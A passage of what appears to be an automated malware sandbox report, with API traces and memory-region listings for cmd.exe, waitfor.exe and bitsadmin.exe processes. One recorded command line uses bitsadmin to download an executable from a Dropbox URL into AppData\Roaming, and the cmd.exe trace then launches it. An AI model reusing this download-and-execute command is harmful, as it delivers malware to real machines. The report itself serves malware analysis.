[0076.981] GetConsoleTitleW (in: lpConsoleTitle=0x20f5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.982] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0076.982] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0076.982] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0076.982] SetErrorMode (uMode=0x0) returned 0x8001 [0076.982] SetErrorMode (uMode=0x1) returned 0x0 [0076.982] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\.", nBufferLength=0x208, lpBuffer=0x41b070, lpFilePart=0x1f29a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x1f29a0*="Roaming") returned 0x21 [0076.982] SetErrorMode (uMode=0x8001) returned 0x1 [0076.982] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\.") returned 1 [0076.982] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.982] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.982] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2710, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2710) returned 0x41b1e0 [0076.982] FindClose (in: hFindFile=0x41b1e0 | out: hFindFile=0x41b1e0) returned 1 [0076.982] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0076.982] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0076.982] GetStartupInfoW (in: lpStartupInfo=0x1f2de0 | out: lpStartupInfo=0x1f2de0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0076.982] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1f2cb8 | out: lpAttributeList=0x0, lpSize=0x1f2cb8) returned 0 [0076.983] GetLastError () returned 0x7a [0076.983] InitializeProcThreadAttributeList (in: lpAttributeList=0x419070, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1f2cb8 | out: lpAttributeList=0x419070, lpSize=0x1f2cb8) returned 1 [0076.983] UpdateProcThreadAttribute (in: lpAttributeList=0x419070, dwFlags=0x0, Attribute=0x60001, lpValue=0x1f2cb0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x419070, lpPreviousValue=0x0) returned 1 [0076.983] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", lpCommandLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1f2cf0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x1f2cd8 | out: lpCommandLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", lpProcessInformation=0x1f2cd8*(hProcess=0x54, hThread=0x50, dwProcessId=0x65c, dwThreadId=0x8ec)) returned 1 [0077.069] DeleteProcThreadAttributeList (in: lpAttributeList=0x419070 | out: lpAttributeList=0x419070) [0077.069] GetLastError () returned 0x715 [0077.069] ResumeThread (hThread=0x50) returned 0x0 [0077.069] CloseHandle (hObject=0x50) returned 1 [0077.070] CloseHandle (hObject=0x54) returned 1 [0077.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.070] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.070] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab4e194 | out: lpMode=0x4ab4e194) returned 1 [0077.070] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.070] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab4e198 | out: lpMode=0x4ab4e198) returned 1 [0077.070] SetConsoleInputExeNameW () returned 0x1 [0077.070] GetConsoleOutputCP () returned 0x1b5 [0077.070] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab5bfe0 | out: lpCPInfo=0x4ab5bfe0) returned 1 [0077.070] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0077.070] exit (_Code=0) Process: id = "3" image_name = "waitfor.exe" filename = "c:\\windows\\system32\\waitfor.exe" page_root = "0x4ef6a000" os_pid = "0xa6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa50" cmd_line = "waitfor /t 5 YKERQ " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 549 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 550 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 551 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 552 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 553 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 554 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 555 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 556 start_va = 0xff370000 end_va = 0xff37efff entry_point = 0xff370000 region_type = mapped_file name = "waitfor.exe" filename = "\\Windows\\System32\\waitfor.exe" (normalized: "c:\\windows\\system32\\waitfor.exe") Region: id = 557 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 558 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 559 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 560 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 561 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 562 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 563 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 566 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 567 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 568 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 569 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "waitfor.exe.mui" filename = "\\Windows\\System32\\en-US\\waitfor.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\waitfor.exe.mui") Region: id = 570 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 571 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 572 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 573 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 574 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 575 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 576 start_va = 0x7c0000 end_va = 0x1bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 577 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 578 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 579 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 580 start_va = 0x7fef8b10000 end_va = 0x7fef8b27fff entry_point = 0x7fef8b10000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 581 start_va = 0x7fefb200000 end_va = 0x7fefb214fff entry_point = 0x7fefb200000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 582 start_va = 0x7fefb220000 end_va = 0x7fefb22bfff entry_point = 0x7fefb220000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 583 start_va = 0x7fefb230000 end_va = 0x7fefb245fff entry_point = 0x7fefb230000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 584 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 585 start_va = 0x7fefcdd0000 end_va = 0x7fefcdf2fff entry_point = 0x7fefcdd0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 586 start_va = 0x7fefce70000 end_va = 0x7fefce7afff entry_point = 0x7fefce70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 587 start_va = 0x7fefcea0000 end_va = 0x7fefcec4fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 588 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 589 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 590 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 591 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 592 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 593 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 594 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 595 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 596 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 597 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 22 os_tid = 0xa70 Process: id = "4" image_name = "bitsadmin.exe" filename = "c:\\windows\\system32\\bitsadmin.exe" page_root = "0x57770000" os_pid = "0xa90" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa50" cmd_line = "bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 620 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 621 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 622 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 623 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 624 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 625 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 626 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 627 start_va = 0xff2a0000 end_va = 0xff2f0fff entry_point = 0xff2a0000 region_type = mapped_file name = "bitsadmin.exe" filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe") Region: id = 628 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 629 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 630 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 631 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 632 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 633 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 634 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 635 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 636 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 637 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 638 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 639 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 640 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 641 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 642 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 643 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 644 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 645 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 646 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 647 start_va = 0x7fefd570000 end_va = 0x7fefe2f7fff entry_point = 0x7fefd570000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 648 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 649 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 650 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 651 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 652 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 653 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 654 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 655 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 656 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0xe0000 region_type = mapped_file name = "bitsadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui") Region: id = 657 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 658 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 659 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 660 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 661 start_va = 0x7d0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 662 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 663 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 664 start_va = 0x420000 end_va = 0x49cfff entry_point = 0x420000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 665 start_va = 0x420000 end_va = 0x49cfff entry_point = 0x420000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 666 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 667 start_va = 0x7fefb930000 end_va = 0x7fefb985fff entry_point = 0x7fefb930000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 668 start_va = 0x1bd0000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 669 start_va = 0x1bd0000 end_va = 0x1caefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bd0000" filename = "" Region: id = 670 start_va = 0x1d90000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 671 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 672 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 673 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 674 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 675 start_va = 0x1f50000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 676 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 677 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 678 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 679 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 680 start_va = 0x420000 end_va = 0x464fff entry_point = 0x420000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 681 start_va = 0x420000 end_va = 0x464fff entry_point = 0x420000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 682 start_va = 0x420000 end_va = 0x464fff entry_point = 0x420000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 683 start_va = 0x420000 end_va = 0x464fff entry_point = 0x420000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 684 start_va = 0x420000 end_va = 0x464fff entry_point = 0x420000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 685 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 686 start_va = 0x1fd0000 end_va = 0x229efff entry_point = 0x1fd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 687 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 688 start_va = 0x1ce0000 end_va = 